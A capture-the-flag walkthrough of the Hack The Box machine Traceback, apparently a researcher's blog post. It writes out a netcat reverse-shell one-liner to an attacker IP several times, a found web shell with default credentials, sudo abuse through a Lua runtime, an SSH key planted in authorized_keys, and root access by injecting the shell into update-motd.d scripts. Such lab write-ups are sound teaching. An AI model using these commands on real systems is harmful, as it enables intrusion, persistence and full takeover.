HTB Traceback — Walkthrough

ENUMERATION

Let's start enumeration with an nmap scan:

$ nmap -A 10.10.10.181
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us

Apache is running on port 80. Visiting the site shows a page saying that a backdoor has been left behind:

This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
- Xh4H -

When I checked the page source there was a comment:

<!--Some of the best web shells that you might need ;)-->

It reminded me of the web shells collected by TheBinitGhimire. To confirm, I searched for this comment on Google and found that the machine creator, Xh4H, has forked the Web-Shells repository by TheBinitGhimire.

I made a wordlist containing the names of all the shells in that repository:

alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

Then I started directory brute-forcing with this list:

# dirsearch.py -u http://10.10.10.181 -w list -e /
dirsearch v0.3.9
Extensions: / | HTTP method: get | Threads: 10 | Wordlist size: 16
Error Log: /root/tools/dirsearch/logs/errors-20-04-28_23-54-08.log
Target: http://10.10.10.181

[23:54:08] Starting:
[23:54:10] 200 - 1KB - /smevk.php
Task Completed

Initial Shell

smevk.php was deployed there and still accepted the default credentials admin:admin, so I logged in and executed a command. The web server turned out to be running as the user webadmin.

To get a reverse shell, first start a listener on the attacking machine:

# nc -lvp 443

then enter the following in the web shell's execute-command form:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f

Privilege Escalation — sysadmin

Inside /home/sysadmin I found a note.txt with the text:

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

Then, on checking the sudo permissions of webadmin with sudo -l, I found that we can run one binary as sysadmin without a password:

(sysadmin) NOPASSWD: /home/sysadmin/luvit

luvit is a Lua runtime, and Lua's os.execute runs a system command, so to get a shell as sysadmin I created a small Lua script and executed it through sudo:

$ echo 'os.execute("bash")' > test.lua
$ sudo -u sysadmin /home/sysadmin/luvit test.lua

user.txt = daad8c6ce76b80********ba5b5817e5

Privilege Escalation — root

During enumeration I found that some files inside the /etc/update-motd.d/ directory are writable, which is a very good sign. The scripts in that directory generate the message of the day: whenever a user logs in (for example over SSH), pam_motd runs every script in the directory as root via run-parts. So if there is a file named test in that directory, every login effectively runs the following as root:

$ /bin/sh test

The problem is that there is a cron job running which replaces the files inside /etc/update-motd.d/ with copies kept at another location where the files are not writable, so we need to be quick.

Also, putting our reverse-shell command at the end of a file does not work, because none of these scripts run through to their last line (the one shown below, for example, either exits with exit 0 or exec's another program before the end), so an appended line is never reached. And if we completely overwrite a file with just our payload (for example with echo > file), the result no longer has its #!/bin/sh interpreter line and is not executed.

I generated an SSH key pair with ssh-keygen on my host machine and then inserted the public key into the sysadmin user's authorized_keys on the server, so that I could later log in as sysadmin (the login is what triggers the motd scripts):

# ssh-keygen
# cat id_rsa.pub

Copy the full public-key text, then on the target as sysadmin:

$ echo "{id_rsa.pub content}" > /home/sysadmin/.ssh/authorized_keys

I inserted my payload into /etc/update-motd.d/91-release-upgrade with nano, directly after the interpreter line.

After that the file content looks like:

#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f   # payload
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi

Then I started an nc listener on my end and SSHed into the box with the private key generated before:

# nc -lvp 443
# ssh -i id_rsa sysadmin@10.10.10.181

This needs to be quick, otherwise our payload file will be replaced by the cron job before the login triggers it.

I failed many times because editing with nano was taking too long, so I used sed instead, with the command below:

$ sed "/sh/a rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f" /etc/update-motd.d/91-release-upgrade > /etc/update-motd.d/50-motd-news

Breaking it into parts:

  • /sh/a appends the following text after every line that matches sh; in this script only the first line, #!/bin/sh, matches, so the payload becomes the second line of the file, right after the interpreter line.
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f is the reverse-shell payload being inserted.
  • /etc/update-motd.d/91-release-upgrade is the file whose contents serve as the template.
  • /etc/update-motd.d/50-motd-news is another file in the same directory that is also executed on login, so I overwrite it with the result. Redirecting sed's output straight back into 91-release-upgrade would not work, because the shell truncates the file before sed reads it (sed -i would be the in-place alternative).

Then SSH into the box and catch the reverse shell on the listener.
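To make the two points above concrete (a line appended at the end of the script never runs because the script exec's away before reaching it, while a line inserted right after #!/bin/sh runs before anything else), here is an added example that is not part of the original post. It builds a constructed stand-in for 91-release-upgrade in a temporary directory, with exec /bin/true playing the role of the exec of release-upgrade-motd, and uses a harmless touch of a marker file in place of the reverse shell. The helper names (write_motd_script, inject_after_shebang, append_payload, run_and_check, demo) are the example's own, and it assumes GNU sed, which accepts the one-line /sh/a form used on the page.

```shell
#!/bin/sh
# Added example (not from the original post). Shows, against a constructed copy
# of an update-motd.d script, why an appended payload never fires and why one
# inserted after the shebang does. The "payload" only touches a marker file.

# Constructed stand-in for /etc/update-motd.d/91-release-upgrade. The real
# script ends by exec'ing release-upgrade-motd; exec /bin/true plays that role
# here so the behaviour (nothing after the exec line ever runs) is the same
# on any machine.
write_motd_script() {
    # $1 = path to write
    cat > "$1" <<'EOF'
#!/bin/sh
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd 2>/dev/null | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
exec /bin/true
EOF
    chmod 755 "$1"
}

# The post's sed trick: `a` appends the text after every line matching /sh/,
# which in this script is only the "#!/bin/sh" shebang, so the payload becomes
# line 2. Output goes to a second file because `sed ... file > file` truncates
# the input before sed reads it (sed -i would be the in-place alternative).
inject_after_shebang() {
    # $1 = template script, $2 = destination, $3 = command to inject
    sed "/sh/a $3" "$1" > "$2" && chmod 755 "$2"
}

# The approach that does not work: put the payload on the last line.
append_payload() {
    # $1 = script, $2 = command to append
    printf '%s\n' "$2" >> "$1"
}

# Runs a script the way the motd machinery does (as a /bin/sh script) and
# reports whether the marker file the payload should create appeared.
run_and_check() {
    # $1 = script, $2 = marker path; prints "fired" or "silent"
    rm -f "$2"
    /bin/sh "$1" >/dev/null 2>&1
    if [ -f "$2" ]; then printf 'fired'; else printf 'silent'; fi
}

# Builds both variants in a temp dir, runs them and prints one summary line.
demo() {
    work=$(mktemp -d)
    mark="$work/marker"
    write_motd_script "$work/91-release-upgrade"

    # 1. appended: the script exec's /bin/true before reaching the last line
    cp "$work/91-release-upgrade" "$work/appended"
    append_payload "$work/appended" "touch $mark"
    appended=$(run_and_check "$work/appended" "$mark")

    # 2. inserted after the shebang: runs before any exit or exec
    inject_after_shebang "$work/91-release-upgrade" "$work/50-motd-news" "touch $mark"
    injected=$(run_and_check "$work/50-motd-news" "$mark")

    rm -rf "$work"
    printf 'appended=%s injected=%s\n' "$appended" "$injected"
}

demo
```

Running it prints appended=silent injected=fired: the same template, the same payload, and only the position decides whether root ever executes it. On the real box the remaining constraint is the cron job, which is why the whole injection has to happen in a single sed invocation immediately before the SSH login.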

I also wrote a Python exploit to automate the exploitation; the link is here.

To get more information about update-motd.d, visit here.

Vaibhav Joshi
Security Researcher | OSCP